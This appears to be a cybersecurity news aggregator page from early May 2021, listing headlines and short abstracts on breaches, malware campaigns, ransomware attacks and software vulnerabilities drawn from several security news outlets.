Microsoft reveals final plan to remove Flash Player in Windows 10 Full Text

Abstract Microsoft quietly revealed its plans to remove the Adobe Flash plugin from Windows 10, with mandatory removal starting in July 2021.

BleepingComputer

May 3, 2021 – Breach

Toronto hit by ‘potential cyber breach’ from Accellion file transfer software Full Text

Abstract The City of Toronto says it suffered a “potential cyber breach” from its use of its Accellion FTA file transfer server in January that may have involved the health information of individuals.

IT World Canada

May 03, 2021 – Malware

A Rust-based Buer Malware Variant Has Been Spotted in the Wild Full Text

Abstract Cybersecurity researchers on Monday disclosed a new malspam campaign distributing a fresh variant of a malware loader called 'Buer' written in Rust, illustrating how adversaries are constantly honing their malware toolsets to evade analysis. Dubbed "RustyBuer," the malware is distributed via emails masquerading as shipping notices from DHL Support, and is said to have affected no fewer than 200 organizations across more than 50 verticals since early April. "The new Buer variant is written in Rust, an efficient and easy-to-use programming language that is becoming increasingly popular," Proofpoint researchers said in a report shared with The Hacker News. "Rewriting the malware in Rust enables the threat actor to better evade existing Buer detection capabilities." First introduced in August of 2019, Buer is a modular malware-as-a-service offering that's sold on underground forums and used as a first-stage downloader to deliver additional

The Hacker News

May 3, 2021 – Breach

Experian API exposed credit scores of tens of millions of Americans Full Text

Abstract Experian API exposed credit scores of tens of millions of Americans due to a weakness with a partner website. Anyone was able to look up the credit score of tens of millions of Americans just by providing their name and mailing address. The issue...

Security Affairs

May 3, 2021 – General

After no ordinary year, congratulations to the 2021 SC Award winners Full Text

Abstract This year’s awards feel quite different because – clearly – this was no ordinary year. The demands placed upon both cybersecurity professionals and vendors were profound, inching on extraordinary. But for all the challenges, these were inspiring times.

SCMagazine

May 3, 2021 – Ransomware

Cloud Hosting Provider Swiss Cloud Suffered Ransomware Attack Impacting Server Infrastructure Full Text

Abstract “On Monday morning, May 3rd, swiss cloud computing ag will inform you again about the current status and outlook,” a statement said. The impacted servers are expected to be restored by next week.

Security Affairs

May 03, 2021 – Ransomware

Researchers Uncover Iranian State-Sponsored Ransomware Operation Full Text

Abstract Iran has been linked to yet another state-sponsored ransomware operation through a contracting company based in the country, according to new analysis. "Iran's Islamic Revolutionary Guard Corps (IRGC) was operating a state-sponsored ransomware campaign through an Iranian contracting company called 'Emen Net Pasargard' (ENP)," cybersecurity firm Flashpoint said in its findings summarizing three documents leaked by an anonymous entity named Read My Lips or Lab Dookhtegan between March 19 and April 1 via its Telegram channel. Dubbed "Project Signal," the initiative is said to have kickstarted sometime between late July 2020 and early September 2020, with ENP's internal research organization, named the "Studies Center," putting together a list of unspecified target websites. A second spreadsheet validated by Flashpoint explicitly spelled out the project's financial motivations, with plans to launch the ransomware operations in late

The Hacker News

May 3, 2021 – General

Threat Report Portugal: Q1 2021 Full Text

Abstract The Threat Report Portugal: Q1 2021 compiles data collected on the malicious campaigns that occurred from January to March, Q1, of 2021. Threat Report Portugal Q1 2021: Phishing and malware by numbers. The Portuguese Abuse Open Feed 0xSI_f33d is...

Security Affairs

May 3, 2021 – General

Not-so-customary customer service: Experts offer tips on vendor best practices Full Text

Abstract From initial overtures and negotiations to installation and implementation to day-to-day operations and troubleshooting, the best vendor-customer relationships require mutual respect and open communication.

SCMagazine

May 3, 2021 – Breach

345,000 Legal and Operational Documents from Filipino Solicitor-General’s Office Accessed by Unknown Third Party Full Text

Abstract The files were publicly available since at least February, when TurgenSec said it first discovered the breach and emailed the solicitor-general and the Philippines government about the files.

ZDNet

May 03, 2021 – Malware

New Chinese Malware Targeted Russia’s Largest Nuclear Submarine Designer Full Text

Abstract A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces. The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous "Royal Road" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed "PortDoor," according to Cybereason's Nocturnus threat intelligence team. "Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more," the researchers said in a write-up on Friday. Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting fo

The Hacker News

May 3, 2021 – General

Keeping up: How the threat landscape drove demand for and development of new capabilities Full Text

Abstract How did a more threatening landscape shape strategies? And what changes will stick? In this SC Awards Winners Circle roundtable discussion, SC Media speaks to cybersecurity leaders, and award winners, about the year that was and its impact on the years to come.

SCMagazine

May 3, 2021 – Breach

COVID-19 Contact Tracing Breach Impacts Private Information of 72,000 People in Pennsylvania Full Text

Abstract Employees of a vendor conducting COVID-19 contact tracing in Pennsylvania may have compromised the information of at least 72,000 people, including their exposure status and their sexual orientation.

6ABC

May 3, 2021 – General

Where do we go from here? The cyber industry’s struggle for speed and superiority Full Text

Abstract The cybersecurity industry faces twin calamities: unprecedented speed of modern cyberattacks and software as a single point of failure. SC Media examines where the cyber market must go from here.

SCMagazine

May 3, 2021 – Criminals

How Cybercriminals Abuse OpenBullet for Credential Stuffing Full Text

Abstract As the business of acquiring unique credentials continues to become more lucrative, cybercriminals are growing their attack tools and techniques by abusing legitimate software for nefarious purposes.

Trend Micro

May 3, 2021 – General

Shedding light on the threat posed by shadow admins Full Text

Abstract If threat actors take control of one of these accounts, they can extend their attack in many ways, perhaps seeking opportunities for lateral movement or privilege escalation whilst staying incognito.

Help Net Security

May 3, 2021 – Vulnerabilities

Researchers develop program that helps assess encryption systems’ vulnerabilities Full Text

Abstract A doctoral student at HSE University has proposed a new method to assess vulnerabilities in encryption systems, which is based on a brute-force search of possible options of symbol deciphering.

Help Net Security

May 2, 2021 – Malware

WeSteal, a shameless commodity cryptocurrency stealer available for sale Full Text

Abstract The bold author of a new cryptocurrency stealer, dubbed WeSteal, is promising its customers a leading way to make money in 2021. A new cryptocurrency stealer dubbed WeSteal is available on the cybercrime underground, unlike other commodity cryptocurrency...

Security Affairs

May 02, 2021 – Privacy

How to stop Windows 10 Defender from uploading files to Microsoft Full Text

Abstract Like other antivirus programs, Microsoft Defender will upload suspicious files to Microsoft to determine if they are malicious. However, some consider this a privacy risk and would rather have their files stay on their computer than being uploaded to a third party. 

BleepingComputer

May 2, 2021 – General

Security Affairs newsletter Round 312 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. 10,000+ unpatched ABUS Secvest home alarms can be deactivated remotely. Hackers are targeting Soliton...

Security Affairs

May 2, 2021 – Hacker

Hacking a Tesla Model X with a DJI Mavic 2 drone equipped with a WIFI dongle Full Text

Abstract A security duo has demonstrated how to hack a Tesla Model X and open its doors using a DJI Mavic 2 drone equipped with a WIFI dongle. The scenario is disconcerting: hackers could use a drone to fly over your Tesla Model X and open the doors, a couple...

Security Affairs

May 2, 2021 – Ransomware

Cloud hosting provider Swiss Cloud suffered a ransomware attack Full Text

Abstract Swiss cloud hosting provider Swiss Cloud has suffered a ransomware attack that seriously impacted its server infrastructure. On April 27 the Swiss cloud hosting provider was hit by a ransomware attack that brought down the company’s server infrastructure. The...

Security Affairs

May 1, 2021 – Malware

The Return of Dridex Banking Trojan Full Text

Abstract Scammers have been found sending QuickBooks invoices to infect victims’ devices with Dridex banking malware. About 14% of the malicious emails reached U.S. clients and 11% reached South Korea.

Cyware Alerts - Hacker News

May 01, 2021 – Solution

Office 365 security baseline adds macro signing, JScript protection Full Text

Abstract Microsoft has updated the security baseline for Microsoft 365 Apps for enterprise (formerly Office 365 Professional Plus) to include protection from JScript code execution attacks and unsigned macros.

BleepingComputer

May 1, 2021 – Ransomware

Babuk - A Growing Ransomware Threat Full Text

Abstract The rapidly emerging Babuk ransomware is becoming a serious threat as it has compromised the networks of sports, communication sectors, and government entities - all within a month.

Cyware Alerts - Hacker News

May 01, 2021 – Ransomware

Python also impacted by critical IP address validation vulnerability Full Text

Abstract Python 3.3 standard library 'ipaddress' suffers from a critical IP address vulnerability (CVE-2021-29921) identical to the flaw that was reported in the "netmask" library earlier this year.

BleepingComputer

May 1, 2021 – Ransomware

Mount Locker Ransomware Learns New Tricks to Evade Detection Full Text

Abstract Researchers have found Mount Locker ransomware using sophisticated scripting and anti-prevention features in recent campaigns, and the change in tactics may be accompanied by the AstroLocker rebranding.

Cyware Alerts - Hacker News

May 1, 2021 – Vulnerabilities

Zero-Day Threats Keeping Organizations Super Busy Full Text

Abstract Zero-day attacks are one of the most challenging threats as they are very difficult to predict. Attackers have exploited zero-day flaws in applications and devices by Microsoft, Google, Apple, and others.

Cyware Alerts - Hacker News

May 1, 2021 – Ransomware

AgeLocker ransomware operation targets QNAP NAS devices Full Text

Abstract Taiwanese vendor QNAP is warning its customers of AgeLocker ransomware attacks on their NAS devices. Crooks behind the AgeLocker ransomware operation are targeting QNAP NAS devices, the Taiwanese vendor warns. The vendor doesn't provide technical...

Security Affairs

May 1, 2021 – Hacker

Lazarus Group Looks to Cryptocurrency Theft to Diversify its Attack Tactics Full Text

Abstract While the North Korean threat actor had targeted e-commerce shops in 2019 and 2020 to steal payment card information, the attackers aimed to steal cryptocurrency, as well.

Cyware Alerts - Hacker News

May 1, 2021 – Vulnerabilities

Flaws in the BIND software expose DNS servers to attacks Full Text

Abstract The Internet Systems Consortium (ISC) released updates for the BIND DNS software to patch several denial-of-service (DoS) and potential RCE flaws. The Internet Systems Consortium (ISC) has released security updates for the BIND DNS software to address...

Security Affairs

May 1, 2021 – Hacker

SolarMarket RAT Uses Google SEO Tactics to Lure Victims Full Text

Abstract Attackers are using Google search redirection and drive-by-download tactics to infect targeted users with SolarMarker RAT.

Cyware Alerts - Hacker News

May 1, 2021 – Ransomware

Babuk crew announced it will stop ransomware attacks Full Text

Abstract Babuk ransomware operators shut down their affiliate program and announced that they will stop using ransomware; the group plans to move on to data theft. Recently the Babuk ransomware operators made the headlines for the ransomware attack against the DC Police...

Security Affairs

May 1, 2021 – Vulnerabilities

Several Threats Still Looming over Microsoft Exchange Full Text

Abstract Security researchers from Sophos revealed that attackers are trying to exploit the ProxyLogon vulnerabilities in Microsoft Exchange to install Monero cryptominer on the targeted servers.

Cyware Alerts - Hacker News

May 1, 2021 – Botnet

Gafgyt Learns from Mirai Botnet Full Text

Abstract The reuse of the Mirai source code has enhanced the capability of Gafgyt to carry out DDoS attacks in various ways.

Cyware Alerts - Hacker News

May 1, 2021 – Ransomware

In The Ransomware Battle, Cybercriminals Have The Upper Hand Full Text

Abstract The NBA's Houston Rockets were hit by a ransomware attack earlier this month. Now it's the Washington, D.C., police department. The common thread is an unknown ransomware group called Babuk.

NPR
